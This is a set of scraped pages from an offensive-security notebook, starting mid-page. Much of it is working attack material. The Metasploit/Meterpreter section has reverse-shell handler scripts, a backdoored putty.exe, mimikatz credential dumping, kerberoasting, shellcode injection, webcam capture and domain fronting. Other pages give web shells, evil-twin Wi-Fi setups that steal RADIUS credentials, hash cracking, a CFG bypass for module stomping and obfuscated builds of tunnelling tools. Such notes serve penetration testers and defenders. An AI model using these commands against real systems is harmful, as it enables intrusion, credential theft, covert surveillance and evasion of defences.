exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080 msf exploit(multi/handler) > run Generate a custom SSL certificate for encrypting C2 communications: Automation (about `exploit` flags [here](https://github.com/rapid7/metasploit-framework/blob/4049c41ac1b6f12566b055dc5442192072ea5d78/lib/msf/ui/console/command_dispatcher/exploit.rb#L17-L27) ): Start SOCKS server (default is SOCKS5): Handle connections with **domain fronting**: Migrate to a different architecture: Switch to the next [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control) killing current session: Reverse local port `3389` (on Victim, `192.168.1.11`) to local port `43389` (on Attacker): Routing: Execute binary from memory: [Execute](https://github.com/b4rtik/metasploit-execute-assembly) .NET assembly from memory: Inject shellcode: Backdoored legit executable with delayed Stdapi loading: Quicky opsec traffic build template: Get web camera capture: [](https://ppn.snovvcra.sh/pentest/c2/meterpreter#debug) Debug ------------------------------------------------------------------- * [https://github.com/deivid-rodriguez/pry-byebug](https://github.com/deivid-rodriguez/pry-byebug) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F64df006f%2Fimg%2Ffavicon_144x144.png&width=20&dpr=3&quality=100&sign=ceedecb1&sv=2)HackTheBox - DropZoneYouTube](https://youtu.be/QzP5nUEhZeg?t=2190) Last updated 1 year ago * [Cheatsheet](https://ppn.snovvcra.sh/pentest/c2/meterpreter#cheatsheet) * [Debug](https://ppn.snovvcra.sh/pentest/c2/meterpreter#debug) Copy $ openssl req -batch -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout cert.key -out cert.crt $ cat cert.key cert.crt > cert.pem $ msfvenom -p ... HandlerSSLCert=./cert.pem StagerVerifySSLCert=true ... msf exploit(multi/handler) > set HandlerSSLCert /home/snovvcrash/cert.pem msf exploit(multi/handler) > set StagerVerifySSLCert true auto.rc Copy // sudo msfconsole -qr auto.rc use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_winhttps set LHOST 10.10.13.37 set LPORT 443 set EXITFUNC thread set StageEncoder x64/zutto_dekiru set EnableStageEncoding true set HandlerSSLCert /home/snovvcrash/cert.pem set StagerVerifySSLCert true set AutoRunScript post/windows/manage/migrate set ExitOnSession false exploit -jz Copy msf > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1 msf auxiliary(server/socks_proxy) > run -j Copy $ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=legitimate.com LPORT=443 HttpHostHeader=cdn.provider.net -f exe -o https.exe msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https msf exploit(multi/handler) > set LHOST legitimate.com msf exploit(multi/handler) > set OverrideLHOST legitimate.com msf exploit(multi/handler) > set OverrideRequestHost true msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net msf exploit(multi/handler) > run Copy msf > use post/windows/manage/archmigrate msf post(windows/manage/archmigrate) > set SESSION 1 msf post(windows/manage/archmigrate) > run Copy meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002 meterpreter > transport list msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp meterpreter > transport next Copy meterpreter > portfwd add -l 43389 -p 3389 -r 192.168.1.11 [*] Local TCP relay created: :43389 <-> 192.168.1.11:3389 $ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389 Copy meterpreter > run autoroute -s 192.168.10.0/24 meterpreter > run autoroute -p Or msf5 > route add 192.168.10.0/24 1 msf5 > route Copy meterpreter > execute -cimH -d calc.exe -f /home/snovvcrash/www/mimikatz.exe -a '"sekurlsa::logonPasswords full" "exit"' Copy msf > use post/windows/manage/execute_dotnet_assembly msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/Rubues.exe msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "kerberoast /usetgtdeleg /format:hashcat" msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1 msf post(windows/manage/execute_dotnet_assembly) > run Copy msf > use post/windows/manage/shellcode_inject msf post(windows/manage/shellcode_inject) > set SHELLCODE /home/snovvcrash/www/shellcode.bin msf post(windows/manage/shellcode_inject) > set SESSION 1 msf post(windows/manage/shellcode_inject) > run Copy $ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe $ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe $ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run' meterpreter > use unhook meterpreter > load stdapi Copy sudo certbot certonly --standalone -d $DOMAIN --register-unsafely-without-email --agree-tos --key-type rsa sudo cat /etc/letsencrypt/live/$DOMAIN/{privkey.pem,cert.pem} > /tmp/cert.pem msfvenom -p windows/x64/meterpreter_reverse_https AutoLoadStdapi='false' AutoSystemInfo='false' HandlerSSLCert='/tmp/cert.pem' HttpCookie='...' HttpReferer='https://www.microsoft.com/en-us/' HttpServerName='nginx' HttpUnknownRequestResponse='...' HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' StagerVerifySSLCert='true' LHOST='...' LPORT='443' LURI='...' -f raw -o /tmp/met.bin Copy meterpreter > webcam_list meterpreter > webcam_snap [-i ] meterpreter > webcam_stream Copy $ gem install pry-byebug $ vi ~/.pry-byebug pry-byebug Copy if defined?(PryByebug) Pry.commands.alias_command 'c', 'continue' Pry.commands.alias_command 's', 'step' Pry.commands.alias_command 'n', 'next' Pry.commands.alias_command 'f', 'finish' end # Hit Enter to repeat last command Pry::Commands.command /^$/, "repeat last command" do _pry_.run_command Pry.history.to_a.last end Copy $ cp -r /usr/share/metasploit-framework/ /opt $ vi /opt/metasploit-framework/msfconsole ...add "require 'pry-byebug'"... $ mkdir -p ~/.msf4/modules/exploits/linux/http/ $ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb $ vi ~/.msf4/modules/exploits/linux/http/p.rb ...add "binding.pry"... --- # Web Shells | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/shells/web-shells.md) . * [https://github.com/kraken-ng/Kraken](https://github.com/kraken-ng/Kraken) [](https://ppn.snovvcra.sh/pentest/shells/web-shells#php) PHP ------------------------------------------------------------------ * [https://stackoverflow.com/a/3697776](https://stackoverflow.com/a/3697776) Copy &1');} ?> [](https://ppn.snovvcra.sh/pentest/shells/web-shells#asp) ASP ------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/shells/web-shells#jscript) JScript Chinese chopper: Copy // Server-side // Client-side Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall()) Last updated 3 years ago * [PHP](https://ppn.snovvcra.sh/pentest/shells/web-shells#php) * [ASP](https://ppn.snovvcra.sh/pentest/shells/web-shells#asp) * [JScript](https://ppn.snovvcra.sh/pentest/shells/web-shells#jscript) --- # VirtualBox | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/virtualization/virtualbox.md) . [](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#dhcp) DHCP -------------------------------------------------------------------------- Configure DHCP in VBox: Copy Cmd > "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" dhcpserver add --netname intnet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.101 --upperip 10.0.1.254 --enable [](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#time-sync) Time Sync ------------------------------------------------------------------------------------ Disable time synchronization with host OS (useful when syncing Kerberos time with `ntpdate`): Copy Cmd > VBoxManage setextradata "Kali Linux" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1 [](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#shared-folders-depreciated) Shared Folders (depreciated) ------------------------------------------------------------------------------------------------------------------------ Mount: Copy $ mkdir ~/Desktop/Share $ mount -t vboxsf /mnt/share-host ~/Desktop/Share Or (if mounted from VBox settings) $ ln -s /mnt/share-host ~/Desktop/Share $ sudo usermod -aG vboxsf `whoami` $ sudo reboot # or re-login Automount: Last updated 4 years ago * [DHCP](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#dhcp) * [Time Sync](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#time-sync) * [Shared Folders (depreciated)](https://ppn.snovvcra.sh/admin/virtualization/virtualbox#shared-folders-depreciated) Copy $ crontab -e "@reboot sleep 10; mount -t vboxsf /mnt/share-host ~/Desktop/Share" --- # Hyper-V | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/virtualization/hyper-v.md) . * [https://xakep.ru/2017/08/09/hyper-v-internals/](https://xakep.ru/2017/08/09/hyper-v-internals/) Enable feature: Copy PS > Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All [](https://ppn.snovvcra.sh/admin/virtualization/hyper-v#sharing-vpn) Sharing VPN ------------------------------------------------------------------------------------- * [https://win10.guru/hyper-v-virtual-machine-use-host-vpn-connection/](https://win10.guru/hyper-v-virtual-machine-use-host-vpn-connection/) [](https://ppn.snovvcra.sh/admin/virtualization/hyper-v#enhanced-session-mode) Enhanced Session Mode --------------------------------------------------------------------------------------------------------- * [https://techcommunity.microsoft.com/t5/virtualization/sneak-peek-taking-a-spin-with-enhanced-linux-vms/ba-p/382415](https://techcommunity.microsoft.com/t5/virtualization/sneak-peek-taking-a-spin-with-enhanced-linux-vms/ba-p/382415) * [https://www.kali.org/docs/virtualization/install-hyper-v-guest-enhanced-session-mode/](https://www.kali.org/docs/virtualization/install-hyper-v-guest-enhanced-session-mode/) 1. `sudo apt install hyperv-daemons` 2. `kali-tweaks` 3. "Configure the system for Hyper-V enhanced session mode" > Shut down VM. 4. `Set-VM "Kali Linux" -EnhancedSessionTransportType HVSocket` 5. Power up VM. Last updated 4 years ago * [Sharing VPN](https://ppn.snovvcra.sh/admin/virtualization/hyper-v#sharing-vpn) * [Enhanced Session Mode](https://ppn.snovvcra.sh/admin/virtualization/hyper-v#enhanced-session-mode) --- # Wi-Fi | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/wi-fi.md) . * [https://www.aircrack-ng.org/doku.php?id=newbie\_guide](https://www.aircrack-ng.org/doku.php?id=newbie_guide) * [https://defkey.com/airodump-ng-shortcuts](https://defkey.com/airodump-ng-shortcuts) * [https://xakep.ru/2020/01/27/wifi-total-pwn/](https://xakep.ru/2020/01/27/wifi-total-pwn/) ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fkoutto%2Fpi-pwnbox-rogueap%2Fmain%2Fmindmap%2FWiFi-Hacking-MindMap-v1.png&width=768&dpr=3&quality=100&sign=8d75099c&sv=2) Pentesting Wi-Fi Mindmap [](https://ppn.snovvcra.sh/pentest/wi-fi#hardware) Hardware ---------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/wi-fi#tp-link-tl-wn722n-v2-v3) TP-Link TL-WN722N v2/v3 * [https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9](https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9) * [https://codeby.net/threads/gajd-2020-po-zapusku-rezhima-monitora-v-tp-link-tl-wn722n-v2-v3-kali-linux-wardriving.70594/](https://codeby.net/threads/gajd-2020-po-zapusku-rezhima-monitora-v-tp-link-tl-wn722n-v2-v3-kali-linux-wardriving.70594/) Chipset: TP-Link TL-WN722N v2/v3 \[Realtek RTL8188EUS\]. Check kernel version: Install kernel headers: Build drivers from source and install: Test for packet injections: ### [](https://ppn.snovvcra.sh/pentest/wi-fi#alfa-awus036ach-ac1200) Alfa AWUS036ACH AC1200 * [https://github.com/aircrack-ng/rtl8812au](https://github.com/aircrack-ng/rtl8812au) Chipset: Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter. Install drivers with apt: Or build from source and install: Test for packet injections: [](https://ppn.snovvcra.sh/pentest/wi-fi#prologue) Prologue ---------------------------------------------------------------- Install stuff: Make sure lsusb can see the wireless adapters (it would show the chipset): Make sure iwconfig can see the wireless adapter: Turn on monitor mode manually: Undo: Or create a separate virtual interface in monitor mode: Undo: Or do it with airmon-ng: In fact, that does not need to be done as airodump-ng can put the wireless card into monitor mode automatically: Make sure, you're not using the default MAC: Restart NM when there are troubles with Internet connection: [](https://ppn.snovvcra.sh/pentest/wi-fi#misc) Misc -------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/wi-fi#wlan-channels) WLAN channels * [https://en.wikipedia.org/wiki/List\_of\_WLAN\_channels](https://en.wikipedia.org/wiki/List_of_WLAN_channels) ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fwww.ekahau.com%2Fwp-content%2Fuploads%2F2020%2F05%2Funlicensed-spectrum-and-channel-allocations_6-ghz.png&width=768&dpr=3&quality=100&sign=af4fb7bb&sv=2) Unlicened Spectrum and Channel Allocations ### [](https://ppn.snovvcra.sh/pentest/wi-fi#signal-strength) Signal Strength * [https://eyesaas.com/wi-fi-signal-strength/](https://eyesaas.com/wi-fi-signal-strength/) Last updated 8 months ago * [Hardware](https://ppn.snovvcra.sh/pentest/wi-fi#hardware) * [TP-Link TL-WN722N v2/v3](https://ppn.snovvcra.sh/pentest/wi-fi#tp-link-tl-wn722n-v2-v3) * [Alfa AWUS036ACH AC1200](https://ppn.snovvcra.sh/pentest/wi-fi#alfa-awus036ach-ac1200) * [Prologue](https://ppn.snovvcra.sh/pentest/wi-fi#prologue) * [Misc](https://ppn.snovvcra.sh/pentest/wi-fi#misc) * [WLAN channels](https://ppn.snovvcra.sh/pentest/wi-fi#wlan-channels) * [Signal Strength](https://ppn.snovvcra.sh/pentest/wi-fi#signal-strength) Copy $ uname -r 5.8.0-kali2-amd64 Copy $ sudo apt install -y bc linux-headers-amd64 Copy $ sudo -i # echo "blacklist r8188eu" >> "/etc/modprobe.d/realtek.conf" # git clone https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9 /opt/rtl8188eus && cd /opt/rtl8188eus # make && make install # reboot Copy $ sudo aireplay-ng -9 wlan1 Copy $ sudo apt update && sudo apt upgrade -y $ sudo apt install realtek-rtl88xxau-dkms $ sudo reboot Copy $ sudo -i # git clone https://github.com/aircrack-ng/rtl8812au /opt/rtl8812au && cd /opt/rtl8812au # ./dkms-install.sh # reboot Copy $ sudo aireplay-ng -9 wlan1 Copy $ sudo apt install lshw cowpatty -y Copy $ lsusb Bus 001 Device 003: ID 2357:010c TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] Bus 001 Device 010: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter Copy $ ifconfig $ iwconfig $ iw dev Copy $ sudo ip link set wlan1 down $ sudo iwconfig wlan1 mode monitor $ sudo ip link set wlan1 up $ iwconfig Copy $ sudo ip link set wlan1 down $ sudo iwconfig wlan1 mode managed $ sudo ip link set wlan1 up $ iwconfig Copy $ sudo ip link set wlan1 down $ sudo iw dev wlan1 interface add wlan1mon type monitor $ sudo ip link set wlan1 up $ sudo service NetworkManager restart $ iwconfig Copy $ sudo ip link set wlan1 down $ sudo iw dev wlan1mon del $ sudo ip link set wlan1 up $ iwconfig Copy $ sudo airmon-ng start wlan1 Copy $ sudo airodump wlan1 Copy $ macchanger -s wlan1 Copy $ sudo service NetworkManager restart --- # DHCP Server & Linux Hotspot | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/networking/dhcp-hostapd.md) . * [https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/](https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/) * [https://learn.adafruit.com/setting-up-a-raspberry-pi-as-a-wifi-access-point/install-software](https://learn.adafruit.com/setting-up-a-raspberry-pi-as-a-wifi-access-point/install-software) Install stuff: Copy sudo apt install isc-dhcp-server hostapd -y sudo systemctl enable isc-dhcp-server sudo systemctl unmask hostapd sudo systemctl enable hostapd Configure DHCP: /etc/dhcp/dhcpd.conf Copy option domain-name "local"; option domain-name-servers 8.8.8.8, 8.8.4.4; default-lease-time 600; max-lease-time 7200; subnet 192.168.200.0 netmask 255.255.255.0 { range 192.168.200.2 192.168.200.20; option subnet-mask 255.255.255.0; option broadcast-address 192.168.200.255; } Configure hotspot: /etc/hostapd/hostapd.conf Copy interface=wlan0 driver=nl80211 ssid=LinuxHotspot hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=Passw0rd! wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 Configure interface (+ set the iface name in `/etc/default/isc-dhcp-server`): Set static IP on the interface: Restart the services: Last updated 4 years ago /etc/network/interfaces Copy iface wlan0 inet static address 192.168.200.1 netmask 255.255.255.0 Copy sudo ifconfig wlan0 down sudo ifconfig wlan0 192.168.200.1 sudo ifconfig wlan0 up Copy $ sudo service isc-dhcp-server restart $ sudo service hostapd restart --- # Enterprise | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise.md) . * [https://medium.com/@adam.toscher/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2](https://medium.com/@adam.toscher/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2) * [https://solstice.sh/iii-eap-downgrade-attacks/](https://solstice.sh/iii-eap-downgrade-attacks/) [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#hostapd-wpe) hostapd-wpe ------------------------------------------------------------------------------------------ * [https://pentest.blog/attacking-wpa-enterprise-wireless-network/](https://pentest.blog/attacking-wpa-enterprise-wireless-network/) * [https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html](https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html) * [https://codeby.net/threads/vzlom-wpa-2-enterprise-s-pomoschju-ataki-evil-twin.59920/](https://codeby.net/threads/vzlom-wpa-2-enterprise-s-pomoschju-ataki-evil-twin.59920/) 1\. Install dependencies: Copy $ sudo apt install libnl-3-dev libssl-dev $ sudo apt install hostapd-wpe 2\. Install and configure hostapd-wpe: Copy $ sudo vi /etc/hostapd-wpe/hostapd-wpe.conf ... interface=wlan1 eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user ssid=NotEvilTwinAP channel=1 hw_mode=b auth_server_addr=127.0.0.1 auth_server_port=18120 auth_server_shared_secret=S3cr3t! wpa_pairwise=TKIP CCMP 3\. Run fake AP with RADIUS server: 4\. Crack Net-NTLM hashes (mask example): [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#apd_launchpad) apd\_launchpad ----------------------------------------------------------------------------------------------- * [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd_launchpad) * [https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html](https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html) [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#eaphammer) EAPHammer -------------------------------------------------------------------------------------- * [https://github.com/s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) Setup: Create a certificate: Steal RADIUS creds: Last updated 4 years ago * [hostapd-wpe](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#hostapd-wpe) * [apd\_launchpad](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#apd_launchpad) * [EAPHammer](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise#eaphammer) Copy $ sudo airmon-ng check kill $ sudo /usr/sbin/hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf Copy $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l ?1?1?1?1?1?1?1?1 $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u ?1?1?1?1?1?1?1?1 $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u?s ?1?1?1?1?1?1?1?1 Copy $ python ~/tools/apd_launchpad/apd_launchpad.py -t radius -s MegaCorp -i wlan1 -ch 1 -cn '*.megacorp.local' -o MegaCorp $ vi radius/radius.conf ... eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user Copy $ git clone https://github.com/s0lst1c3/eaphammer.git ~/tools/eaphammer && cd ~/tools/eaphammer $ sudo ./kali-setup $ sudo python3 -m pip install flask-cors flask-socketio --upgrade Copy $ sudo ./eaphammer --cert-wizard Copy $ sudo ./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 1 --interface wlan1 --auth wpa-eap --creds --- # API Hooking | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/api-hooking.md) . * [https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++](https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++) * [https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html) * [https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html) [](https://ppn.snovvcra.sh/red-team/dev/api-hooking#examples) Examples --------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/dev/api-hooking#c) C++ * [https://github.com/mgeeky/ShellcodeFluctuation/blob/master/ShellcodeFluctuation/main.cpp](https://github.com/mgeeky/ShellcodeFluctuation/blob/master/ShellcodeFluctuation/main.cpp) * [https://github.com/snovvcrash/VeraCryptThief/blob/main/VeraCryptThiefDll/veracryptthief.cpp](https://github.com/snovvcrash/VeraCryptThief/blob/main/VeraCryptThiefDll/veracryptthief.cpp) ### [](https://ppn.snovvcra.sh/red-team/dev/api-hooking#c-1) C# * [https://gist.github.com/NaxAlpha/144d1dd96c7d0ad29fe149e4063a8f25](https://gist.github.com/NaxAlpha/144d1dd96c7d0ad29fe149e4063a8f25) [](https://ppn.snovvcra.sh/red-team/dev/api-hooking#tools) Tools --------------------------------------------------------------------- * [https://github.com/CCob/MinHook.NET](https://github.com/CCob/MinHook.NET) * [https://github.com/CCob/SharpBlock](https://github.com/CCob/SharpBlock) * [https://github.com/ars3n11/MineSweeper](https://github.com/ars3n11/MineSweeper) Last updated 3 years ago * [Examples](https://ppn.snovvcra.sh/red-team/dev/api-hooking#examples) * [C++](https://ppn.snovvcra.sh/red-team/dev/api-hooking#c) * [C#](https://ppn.snovvcra.sh/red-team/dev/api-hooking#c-1) * [Tools](https://ppn.snovvcra.sh/red-team/dev/api-hooking#tools) --- # Golang | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/golang.md) . * [https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c](https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c) * [https://ethicalchaos.dev/2020/01/26/weaponizing-your-favorite-go-program-for-cobalt-strike/](https://ethicalchaos.dev/2020/01/26/weaponizing-your-favorite-go-program-for-cobalt-strike/) * [https://sokarepo.github.io//redteam/2023/10/11/create-reflective-dll-for-cobaltstrike.html](https://sokarepo.github.io//redteam/2023/10/11/create-reflective-dll-for-cobaltstrike.html) [](https://ppn.snovvcra.sh/red-team/dev/golang#obfuscate-go-tooling) Obfuscate Go Tooling ---------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/dev/golang#garble) garble Example with [chisel](https://github.com/jpillora/chisel) : Copy $ go install mvdan.cc/garble@latest $ go install github.com/jpillora/chisel@latest $ git clone https://github.com/jpillora/chisel chisel-src && cd chisel-src $ env CGO_ENABLED=0 GOOS=windows GOARCH=amd64 garble -literals -tiny build -ldflags "-s -w -H windowsgui" -trimpath Example with [rsockstun](https://github.com/llkat/rsockstun) : Copy $ git clone https://github.com/llkat/rsockstun rsockstun-src && cd rsockstun-src $ go mod init rsockstun && go mod tidy $ env CGO_ENABLED=0 GOOS=windows GOARCH=amd64 garble -literals -tiny build -ldflags "-s -w -H windowsgui" -trimpath Last updated 1 year ago * [Obfuscate Go Tooling](https://ppn.snovvcra.sh/red-team/dev/golang#obfuscate-go-tooling) * [garble](https://ppn.snovvcra.sh/red-team/dev/golang#garble) --- # CFG | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/cfg.md) . * [\[PDF\] Bypass Control Flow Guard Comprehensively (Zhang Yunhai)](https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-Control-Flow-Guard-Comprehensively-wp.pdf) * [https://habr.com/ru/companies/dsec/articles/305960/](https://habr.com/ru/companies/dsec/articles/305960/) [](https://ppn.snovvcra.sh/red-team/dev/cfg#cfg-bypasses-for-module-stomping) CFG Bypasses for Module Stomping ------------------------------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/dev/cfg#patch) Patch * [https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/](https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/) ### [](https://ppn.snovvcra.sh/red-team/dev/cfg#mark-as-valid-setprocessvalidcalltargets) Mark as Valid (SetProcessValidCallTargets) * [https://www.fortinet.com/blog/threat-research/documenting-the-undocumented-adding-cfg-exceptions](https://www.fortinet.com/blog/threat-research/documenting-the-undocumented-adding-cfg-exceptions) * [https://github.com/Crypt0s/Ekko\_CFG\_Bypass/blob/main/Ekko\_CFG\_Bypass/CFG.c#L8-L39](https://github.com/Crypt0s/Ekko_CFG_Bypass/blob/main/Ekko_CFG_Bypass/CFG.c#L8-L39) * [https://github.com/Crypt0s/Ekko\_CFG\_Bypass/blob/main/Ekko\_CFG\_Bypass/CFG.c#L41-L86](https://github.com/Crypt0s/Ekko_CFG_Bypass/blob/main/Ekko_CFG_Bypass/CFG.c#L41-L86) * [https://github.com/BreakingMalwareResearch/CFGExceptions/blob/master/CFGExceptions/main.cpp](https://github.com/BreakingMalwareResearch/CFGExceptions/blob/master/CFGExceptions/main.cpp) * [https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/](https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/) * [https://github.com/WithSecureLabs/ModuleStomping/blob/master/injectionUtils/moduleManipulation.cpp#L231-L239](https://github.com/WithSecureLabs/ModuleStomping/blob/master/injectionUtils/moduleManipulation.cpp#L231-L239) Mark everything in the target module as valid: Copy void markCFGValid(unsigned long long ptrToMarkValid) { CFG_CALL_TARGET_INFO info; info.Flags = CFG_CALL_TARGET_VALID; info.Offset = ptrToMarkValid; if (!SetProcessValidCallTargets_(targetProcess, targetModuleBase, sizeOfImage, 1, &info)) throw std::exception("SetProcessValidCallTargets failed"); } if (srcSect.Characteristics & IMAGE_SCN_MEM_EXECUTE) for (unsigned int n = 0; n < srcSect.VirtualSize; n += 16) targetModule.markCFGValid(n); Last updated 1 year ago * [CFG Bypasses for Module Stomping](https://ppn.snovvcra.sh/red-team/dev/cfg#cfg-bypasses-for-module-stomping) * [Patch](https://ppn.snovvcra.sh/red-team/dev/cfg#patch) * [Mark as Valid (SetProcessValidCallTargets)](https://ppn.snovvcra.sh/red-team/dev/cfg#mark-as-valid-setprocessvalidcalltargets) --- # Nim | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/nim.md) . * [https://github.com/byt3bl33d3r/OffensiveNim](https://github.com/byt3bl33d3r/OffensiveNim) * [https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/](https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/) * [https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim](https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim) * [https://github.com/ajpc500/NimExamples](https://github.com/ajpc500/NimExamples) * [https://huskyhacks.dev/2021/07/17/nim-exploit-dev/](https://huskyhacks.dev/2021/07/17/nim-exploit-dev/) * [https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/](https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/) [](https://ppn.snovvcra.sh/red-team/dev/nim#install) Install ----------------------------------------------------------------- Windows: * 